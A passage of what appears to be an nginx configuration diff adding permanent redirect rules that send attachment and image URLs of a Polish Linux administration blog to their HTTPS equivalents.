permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/zp5/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/zp5/ permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/zp4/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/zp4/ permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/zp3/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/zp3/ permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/zp2/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/zp2/ permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/zp1/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/zp1/ permanent; +rewrite ^/1186/panel-hostingowy-zpanel-na-centos-6-6/zplogo_v9/$ https://blog.linuxiarz.pl/1186/panel-hostingowy-zpanel-na-centos-6-6/zplogo_v9/ permanent; +rewrite ^/1176/serwer-teamspeak-3-na-freebsd-10-1/bsd1/$ https://blog.linuxiarz.pl/1176/serwer-teamspeak-3-na-freebsd-10-1/bsd1/ permanent; +rewrite ^/1176/serwer-teamspeak-3-na-freebsd-10-1/logo-full/$ https://blog.linuxiarz.pl/1176/serwer-teamspeak-3-na-freebsd-10-1/logo-full/ permanent; +rewrite ^/1176/serwer-teamspeak-3-na-freebsd-10-1/ts3bsd2/$ https://blog.linuxiarz.pl/1176/serwer-teamspeak-3-na-freebsd-10-1/ts3bsd2/ permanent; +rewrite ^/1176/serwer-teamspeak-3-na-freebsd-10-1/ts3bsd1/$ https://blog.linuxiarz.pl/1176/serwer-teamspeak-3-na-freebsd-10-1/ts3bsd1/ permanent; +rewrite ^/1166/instalacja-fedora-core-22-na-virtual-box-video/attachment/1171/$ https://blog.linuxiarz.pl/1166/instalacja-fedora-core-22-na-virtual-box-video/attachment/1171/ permanent; +rewrite ^/1166/instalacja-fedora-core-22-na-virtual-box-video/attachment/000/$ https://blog.linuxiarz.pl/1166/instalacja-fedora-core-22-na-virtual-box-video/attachment/000/ permanent; +rewrite ^/1166/instalacja-fedora-core-22-na-virtual-box-video/attachment/1167/$ https://blog.linuxiarz.pl/1166/instalacja-fedora-core-22-na-virtual-box-video/attachment/1167/ permanent; +rewrite ^/1159/lemp-centos-7/lemp1/$ https://blog.linuxiarz.pl/1159/lemp-centos-7/lemp1/ permanent; +rewrite ^/1159/lemp-centos-7/lemp-2/$ https://blog.linuxiarz.pl/1159/lemp-centos-7/lemp-2/ permanent; +rewrite ^/1159/lemp-centos-7/nginx-pma/$ https://blog.linuxiarz.pl/1159/lemp-centos-7/nginx-pma/ permanent; +rewrite ^/1159/lemp-centos-7/psi-nginx/$ https://blog.linuxiarz.pl/1159/lemp-centos-7/psi-nginx/ permanent; +rewrite ^/1159/lemp-centos-7/nginx/$ https://blog.linuxiarz.pl/1159/lemp-centos-7/nginx/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/zrzut-rt-2/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/zrzut-rt-2/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/rutorrent-logo/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/rutorrent-logo/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/rt1/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/rt1/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/rt3/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/rt3/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/rt4/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/rt4/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/rt5/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/rt5/ permanent; +rewrite ^/1145/automatyczna-instalacja-rtorrent-rutorrent/rt2/$ https://blog.linuxiarz.pl/1145/automatyczna-instalacja-rtorrent-rutorrent/rt2/ permanent; +rewrite ^/1140/centos-7-htop/htop/$ https://blog.linuxiarz.pl/1140/centos-7-htop/htop/ permanent; +rewrite ^/1140/centos-7-htop/logo-1/$ https://blog.linuxiarz.pl/1140/centos-7-htop/logo-1/ permanent; +rewrite ^/1134/statystyki-serwera-www-apache2-w-czasie-rzeczywistym/screencapture-5-196-66-201-server-status-1428993369180/$ https://blog.linuxiarz.pl/1134/statystyki-serwera-www-apache2-w-czasie-rzeczywistym/screencapture-5-196-66-201-server-status-1428993369180/ permanent; +rewrite ^/1134/statystyki-serwera-www-apache2-w-czasie-rzeczywistym/i-apache-2-2/$ https://blog.linuxiarz.pl/1134/statystyki-serwera-www-apache2-w-czasie-rzeczywistym/i-apache-2-2/ permanent; +rewrite ^/1105/instalacja-owncloud-apache-mariadb/owncloud-logo/$ https://blog.linuxiarz.pl/1105/instalacja-owncloud-apache-mariadb/owncloud-logo/ permanent; +rewrite ^/1105/instalacja-owncloud-apache-mariadb/screencapture-cloud-linuxiarz-pl-index-php-apps-files/$ https://blog.linuxiarz.pl/1105/instalacja-owncloud-apache-mariadb/screencapture-cloud-linuxiarz-pl-index-php-apps-files/ permanent; +rewrite ^/1105/instalacja-owncloud-apache-mariadb/screencapture-cloud-linuxiarz-pl/$ https://blog.linuxiarz.pl/1105/instalacja-owncloud-apache-mariadb/screencapture-cloud-linuxiarz-pl/ permanent; +rewrite ^/1105/instalacja-owncloud-apache-mariadb/owncloud/$ https://blog.linuxiarz.pl/1105/instalacja-owncloud-apache-mariadb/owncloud/ permanent; +rewrite ^/1098/open-game-panel-panel-gier-online/n2ckp/$ https://blog.linuxiarz.pl/1098/open-game-panel-panel-gier-online/n2ckp/ permanent; +rewrite ^/1098/open-game-panel-panel-gier-online/logo-2/$ https://blog.linuxiarz.pl/1098/open-game-panel-panel-gier-online/logo-2/ permanent; +rewrite ^/1098/open-game-panel-panel-gier-online/zehen/$ https://blog.linuxiarz.pl/1098/open-game-panel-panel-gier-online/zehen/ permanent; +rewrite ^/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/llgfo/$ https://blog.linuxiarz.pl/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/llgfo/ permanent; +rewrite ^/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/phpinfo/$ https://blog.linuxiarz.pl/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/phpinfo/ permanent; +rewrite ^/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/lemp/$ https://blog.linuxiarz.pl/1083/debian-7-nginx-php5-mariadb-10-phpmyadmin/lemp/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss6-2/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss6-2/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss5-2/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss5-2/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss4-2/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss4-2/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss3-2/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss3-2/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss2-3/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss2-3/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss2-2/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss2-2/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/ss1-2/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ss1-2/ permanent; +rewrite ^/xms-banner/$ https://blog.linuxiarz.pl/xms-banner/ permanent; +rewrite ^/1059/szybka-instalacja-skryptu-phpsysinfo/phpsysinfo/$ https://blog.linuxiarz.pl/1059/szybka-instalacja-skryptu-phpsysinfo/phpsysinfo/ permanent; +rewrite ^/1059/szybka-instalacja-skryptu-phpsysinfo/phpsysinfo-logo/$ https://blog.linuxiarz.pl/1059/szybka-instalacja-skryptu-phpsysinfo/phpsysinfo-logo/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/ispconfig_logo/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/ispconfig_logo/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_9/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_9/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_8/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_8/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_7/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_7/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_6/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_6/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_5/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_5/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_4/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_4/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_3/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_3/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_2/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_2/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_1/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/isp_1/ permanent; +rewrite ^/linuxiarz-2/$ https://blog.linuxiarz.pl/linuxiarz-2/ permanent; +rewrite ^/linuxiarz/$ https://blog.linuxiarz.pl/linuxiarz/ permanent; +rewrite ^/logo1/$ https://blog.linuxiarz.pl/logo1/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/teamspeak3/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/teamspeak3/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_5/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_5/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_4/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_4/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_3/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_3/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_2/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_2/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_1/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ts3_1/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss5/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss5/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss6/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss6/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss4/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss4/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss3/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss3/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss2/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss2/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss1/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ss1/ permanent; +rewrite ^/994/instalacja-lighttpd-php5-na/lighttpd-debian-fi-390x170/$ https://blog.linuxiarz.pl/994/instalacja-lighttpd-php5-na/lighttpd-debian-fi-390x170/ permanent; +rewrite ^/988/migracja-z-serwera-mysql-na-mariadb/pma/$ https://blog.linuxiarz.pl/988/migracja-z-serwera-mysql-na-mariadb/pma/ permanent; +rewrite ^/988/migracja-z-serwera-mysql-na-mariadb/mariadb_logo_from_skysql_ab/$ https://blog.linuxiarz.pl/988/migracja-z-serwera-mysql-na-mariadb/mariadb_logo_from_skysql_ab/ permanent; +rewrite ^/985/reaktywacja-unitra-eu-org/logo/$ https://blog.linuxiarz.pl/985/reaktywacja-unitra-eu-org/logo/ permanent; +rewrite ^/972/instalacja-vestacp-panel-administracyny/vesta-cp/$ https://blog.linuxiarz.pl/972/instalacja-vestacp-panel-administracyny/vesta-cp/ permanent; +rewrite ^/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-51-pm/$ https://blog.linuxiarz.pl/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-51-pm/ permanent; +rewrite ^/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-48-pm/$ https://blog.linuxiarz.pl/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-48-pm/ permanent; +rewrite ^/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-46-pm/$ https://blog.linuxiarz.pl/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-46-pm/ permanent; +rewrite ^/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-43-pm/$ https://blog.linuxiarz.pl/972/instalacja-vestacp-panel-administracyny/screen-shot-02-08-15-at-02-43-pm/ permanent; +rewrite ^/967/wlaczenie-userdir-w-apache2/userdir/$ https://blog.linuxiarz.pl/967/wlaczenie-userdir-w-apache2/userdir/ permanent; +rewrite ^/960/proftp-wirtualny-uzytkownik/servidor-ftp-proftpd-logo/$ https://blog.linuxiarz.pl/960/proftp-wirtualny-uzytkownik/servidor-ftp-proftpd-logo/ permanent; +rewrite ^/953/fail2ban-musisz-to-miec/fail2ban-logo/$ https://blog.linuxiarz.pl/953/fail2ban-musisz-to-miec/fail2ban-logo/ permanent; +rewrite ^/949/serwer-team-speak-3-zaktualizowany/pre_1377468169__ts/$ https://blog.linuxiarz.pl/949/serwer-team-speak-3-zaktualizowany/pre_1377468169__ts/ permanent; +rewrite ^/945/auto-backup-baz-danych-mysql/mysql-backup/$ https://blog.linuxiarz.pl/945/auto-backup-baz-danych-mysql/mysql-backup/ permanent; +rewrite ^/931/mtr-alternatywa-dla-traceroute/mtr4/$ https://blog.linuxiarz.pl/931/mtr-alternatywa-dla-traceroute/mtr4/ permanent; +rewrite ^/931/mtr-alternatywa-dla-traceroute/mtr3/$ https://blog.linuxiarz.pl/931/mtr-alternatywa-dla-traceroute/mtr3/ permanent; +rewrite ^/931/mtr-alternatywa-dla-traceroute/mtr2/$ https://blog.linuxiarz.pl/931/mtr-alternatywa-dla-traceroute/mtr2/ permanent; +rewrite ^/931/mtr-alternatywa-dla-traceroute/mtr1/$ https://blog.linuxiarz.pl/931/mtr-alternatywa-dla-traceroute/mtr1/ permanent; +rewrite ^/924/butterfly-czyli-konsola-w-przegladarce/687474703a2f2f70617261646f7878787a65726f2e6769746875622e696f2f6173736574732f627574746572666c795f312e676966/$ https://blog.linuxiarz.pl/924/butterfly-czyli-konsola-w-przegladarce/687474703a2f2f70617261646f7878787a65726f2e6769746875622e696f2f6173736574732f627574746572666c795f312e676966/ permanent; +rewrite ^/924/butterfly-czyli-konsola-w-przegladarce/butterfly/$ https://blog.linuxiarz.pl/924/butterfly-czyli-konsola-w-przegladarce/butterfly/ permanent; +rewrite ^/919/tekst-przed-zalogowaniem-do-konsoli/33fnw/$ https://blog.linuxiarz.pl/919/tekst-przed-zalogowaniem-do-konsoli/33fnw/ permanent; +rewrite ^/887/moja-siec-domowa/logo_new800/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/logo_new800/ permanent; +rewrite ^/887/moja-siec-domowa/img_20141015_125912/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/img_20141015_125912/ permanent; +rewrite ^/887/moja-siec-domowa/img_20141015_125859/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/img_20141015_125859/ permanent; +rewrite ^/887/moja-siec-domowa/ir81s/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/ir81s/ permanent; +rewrite ^/887/moja-siec-domowa/tp_link_tl_sm321b-e27f9094/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/tp_link_tl_sm321b-e27f9094/ permanent; +rewrite ^/887/moja-siec-domowa/tp_link_mc220l-3db75326/$ https://blog.linuxiarz.pl/887/moja-siec-domowa/tp_link_mc220l-3db75326/ permanent; +rewrite ^/876/support-lenovo-i-mile-zaskoczenie/img_20141003_150657/$ https://blog.linuxiarz.pl/876/support-lenovo-i-mile-zaskoczenie/img_20141003_150657/ permanent; +rewrite ^/876/support-lenovo-i-mile-zaskoczenie/img_20141003_15070522/$ https://blog.linuxiarz.pl/876/support-lenovo-i-mile-zaskoczenie/img_20141003_15070522/ permanent; +rewrite ^/876/support-lenovo-i-mile-zaskoczenie/supprt4/$ https://blog.linuxiarz.pl/876/support-lenovo-i-mile-zaskoczenie/supprt4/ permanent; +rewrite ^/859/nowy-domowy-router-mikrotik-rb951g-2hnd/903_l/$ https://blog.linuxiarz.pl/859/nowy-domowy-router-mikrotik-rb951g-2hnd/903_l/ permanent; +rewrite ^/859/nowy-domowy-router-mikrotik-rb951g-2hnd/img_20140823_171707/$ https://blog.linuxiarz.pl/859/nowy-domowy-router-mikrotik-rb951g-2hnd/img_20140823_171707/ permanent; +rewrite ^/849/apache-i-tworzenie-virtualhostow/apache-http-server/$ https://blog.linuxiarz.pl/849/apache-i-tworzenie-virtualhostow/apache-http-server/ permanent; +rewrite ^/843/zmiana-nazwy-hosta-w-monitoringu-munin-change-munin-hostname/munin_logo/$ https://blog.linuxiarz.pl/843/zmiana-nazwy-hosta-w-monitoringu-munin-change-munin-hostname/munin_logo/ permanent; +rewrite ^/341/aria2-na-linux-debian/x-mb-yet-another-aria2-web-frontend/$ https://blog.linuxiarz.pl/341/aria2-na-linux-debian/x-mb-yet-another-aria2-web-frontend/ permanent; +rewrite ^/341/aria2-na-linux-debian/x-kb-yet-another-aria2-web-frontend/$ https://blog.linuxiarz.pl/341/aria2-na-linux-debian/x-kb-yet-another-aria2-web-frontend/ permanent; +rewrite ^/816/parkowanie-domeny-na-vps-z-uzyciem-bind/domena/$ https://blog.linuxiarz.pl/816/parkowanie-domeny-na-vps-z-uzyciem-bind/domena/ permanent; +rewrite ^/tapeciarnia-pl70984_statua_wolnosci_linux-1280x800/$ https://blog.linuxiarz.pl/tapeciarnia-pl70984_statua_wolnosci_linux-1280x800/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/pptp6/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/pptp6/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/pptp5/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/pptp5/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/pptp4/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/pptp4/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/pptp3/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/pptp3/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/pptp2/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/pptp2/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/pptp1/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/pptp1/ permanent; +rewrite ^/784/dd-wrt-i-ustawianie-routera-w-tryb-ap-bridge/ddwrt1/$ https://blog.linuxiarz.pl/784/dd-wrt-i-ustawianie-routera-w-tryb-ap-bridge/ddwrt1/ permanent; +rewrite ^/777/ts3-linuxiarz-pl-bot-muzyczny/teamspeak3bot/$ https://blog.linuxiarz.pl/777/ts3-linuxiarz-pl-bot-muzyczny/teamspeak3bot/ permanent; +rewrite ^/764/stawianie-serwera-team-speak-3-baza-mysql/ts__/$ https://blog.linuxiarz.pl/764/stawianie-serwera-team-speak-3-baza-mysql/ts__/ permanent; +rewrite ^/759/teamspeak-3-instalacja-licencji-i-aktualizacja/ts/$ https://blog.linuxiarz.pl/759/teamspeak-3-instalacja-licencji-i-aktualizacja/ts/ permanent; +rewrite ^/736/google-cloud-print-skrypt-startowy/cloudprint/$ https://blog.linuxiarz.pl/736/google-cloud-print-skrypt-startowy/cloudprint/ permanent; +rewrite ^/729/droopy-prosty-upload-plikow-w-pythonie/droopy/$ https://blog.linuxiarz.pl/729/droopy-prosty-upload-plikow-w-pythonie/droopy/ permanent; +rewrite ^/722/kompilacja-minidlna-ze-zrodel/screenshot_2014-03-02-21-24-46/$ https://blog.linuxiarz.pl/722/kompilacja-minidlna-ze-zrodel/screenshot_2014-03-02-21-24-46/ permanent; +rewrite ^/706/hackowanie-lamanie-hasla-windows-xp/img_20140223_135202/$ https://blog.linuxiarz.pl/706/hackowanie-lamanie-hasla-windows-xp/img_20140223_135202/ permanent; +rewrite ^/706/hackowanie-lamanie-hasla-windows-xp/img_20140223_131409/$ https://blog.linuxiarz.pl/706/hackowanie-lamanie-hasla-windows-xp/img_20140223_131409/ permanent; +rewrite ^/706/hackowanie-lamanie-hasla-windows-xp/img_20140223_131414/$ https://blog.linuxiarz.pl/706/hackowanie-lamanie-hasla-windows-xp/img_20140223_131414/ permanent; +rewrite ^/701/aktualizacja-tvheadend/ss/$ https://blog.linuxiarz.pl/701/aktualizacja-tvheadend/ss/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_173725/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_173725/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_154530/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_154530/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_154521/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_154521/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152450/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152450/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152440/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152440/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152433/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152433/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152054/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152054/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152051/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_152051/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143722/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143722/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143711/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143711/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143706/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143706/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143641/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143641/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143628/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143628/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143621/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143621/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143617/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/img_20140221_143617/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/attachment/3888663255/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/attachment/3888663255/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/048def6dec19230acf09da1f41e9d3fc/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/048def6dec19230acf09da1f41e9d3fc/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/chieftec-logo_official/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/chieftec-logo_official/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/9/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/9/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/8/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/8/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/7/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/7/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/6/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/6/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/5/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/5/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/4/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/attachment/4/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/3-2/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/3-2/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/2-2/$ 